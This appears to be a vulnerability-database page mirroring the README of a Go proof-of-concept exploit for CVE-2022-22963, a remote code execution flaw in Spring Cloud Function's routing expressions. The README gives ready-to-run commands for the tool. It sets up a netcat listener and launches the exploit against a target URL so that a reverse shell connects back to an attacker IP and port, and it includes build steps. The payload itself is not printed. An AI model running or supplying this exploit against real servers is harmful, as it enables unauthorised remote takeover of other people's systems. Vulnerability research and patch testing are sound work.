CVE-2022-22963 PoC — Spring Framework 代码注入漏洞

Source

https://github.com/gunzf0x/CVE-2022-22963

Associated Vulnerability

Title:Spring Framework 代码注入漏洞 (CVE-2022-22963)
Description:In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.

Description

Binaries for CVE-2022-22963

Readme

# CVE-2022-22963

Remote Code Execution exploiting CVE-2022-22963 attacking Spring Cloud service.

**Disclamier: This is for educational purposes only. The author is not responsible for the use of this program. Use under your own risk**


## Usage
```sh
./CVE-2022-22963 -h


Usage:
  CVE-2022-22963 [OPTIONS]

Application Options:
  -u, --target-url=     Target/Host url where 'Spring Cloud' is running. Example: -t http://somesite.htb
  -p, --target-port=    Port running the service. Example: -p 8080
  -i, --attacker-ip=    Attacker IPv4 Address. Example: -i 10.10.10.10
  -l, --listening-port= Listening port to connect. Example: -l 1337

Help Options:
  -h, --help            Show this help message
```

Assume a possible vulnerable target is running at `http://somerandomserver.com:8080`. Start `nc` listening on the port `1337`, so we run `nc -lvnp 1337`. Then, run the script/exploit:
```sh
./CVE-2022-22963 -u http://somerandomserver.com -p 8080 -i 10.10.10.10 -l 1337 
```

## Build from source
If you have `go` installed in your machine, just do:
```sh
git clone https://github.com/GunZF0x/CVE-2022-22963.git
cd CVE-2022-22963
go run main.go -h #run without compiling any file
go build -o exploit main.go #build the file
```

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!